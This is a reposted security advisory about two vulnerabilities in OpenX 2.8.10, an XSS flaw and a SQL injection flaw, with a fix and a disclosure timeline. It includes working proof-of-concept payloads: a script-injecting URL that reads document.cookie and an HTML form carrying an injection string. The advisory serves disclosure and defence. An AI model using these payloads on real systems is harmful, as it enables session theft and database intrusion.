CVE-2012-4990

Security News - Security Reviews - Exploits - Tools - UNIX Focus - Windows Focus

SecuriTeam™
Beyond Security®

SecuriTeam™ Home
Ask the Team
Mailing Lists
Advertising Info
Blogs

	SecuriTeam™ in Your Inbox

	E-mail this CVE-2012-4990 to a friend

New vulnerability?
New tool?
Tell us

Credit:
The original article can be found at: https://www.htbridge.com/advisory/HTB23116

Website Security Scan	Code Vulnerability Test	Network Assessment Tool
Detect hidden vulnerabilities	Exhaustive automated testing	Real-time, continuous security
Get guidance from professionals	of internal or 3rd party code.	scanning for your entire network

Check for CVE-2012-4990

Vulnerability Assessment and Management.
Automated Pen Testing for 50 to 50,000 nodes
beyondsecurity.com/vulnerability-scanner

Vulnerable Systems:
* OpenX 2.8.10 and probably prior

1) Cross-Site Scripting (XSS) in OpenX: CVE-2012-4989
Input passed via the "parent" GET parameter to /www/admin/plugin-index.php is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in administrator's browser session in context of an affected website.

The following PoC (Proof of Concept) demonstrates the vulnerability:
http://[host]/www/admin/plugin-index.php?action=info&group=vastInlineBannerTypeHtml&parent=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E

2) SQL Injection in OpenX: CVE-2012-4990
Input passed via the "ids[]" POST parameter to /www/admin/campaign-zone-link.php is not properly sanitised before being used in SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.
The following PoC demonstrates the vulnerability:

<form action="http://[host]/www/admin/campaign-zone-link.php"; method="post">
<input type="hidden" name="action" value='link' />
<input type="hidden" name="ids[]" value="z1)) OR 1=(select min(@a:=1)from (select 1 union select 2)k group by (select
concat(@@version,0x0,@a:=(@a+1)%2))) -- " />
<input type="hidden" name="clientid" value='[CLIENT_ID]' />
<input type="hidden" name="campaignid" value='[CAMPAIGN_ID]' />
<input type="hidden" name="" value='' />
<input type="hidden" name="" value='' />
<input type="hidden" name="" value='' />
<input type="hidden" name="" value='' />
<input type="submit" id="btn">
</form>

Successful exploitation of this vulnerability requires attacker to be registered, logged-in and have permission to access link zone.

Solution:
Fixed in SVN repository, revision 81823

Replace next files:
[CWE-79] https://svn.openx.org/openx/trunk/lib/templates/admin/plugin-group-view.html
[CWE-89] https://svn.openx.org/openx/trunk/www/admin/campaign-zone-link.php

CVE Information:
CVE-2012-4989
CVE-2012-4990

Disclosure Timeline:
Vendor Notification: September 19, 2012
Public Disclosure: October 10, 2012

Security News - Security Reviews - Exploits - Tools - UNIX Focus - Windows Focus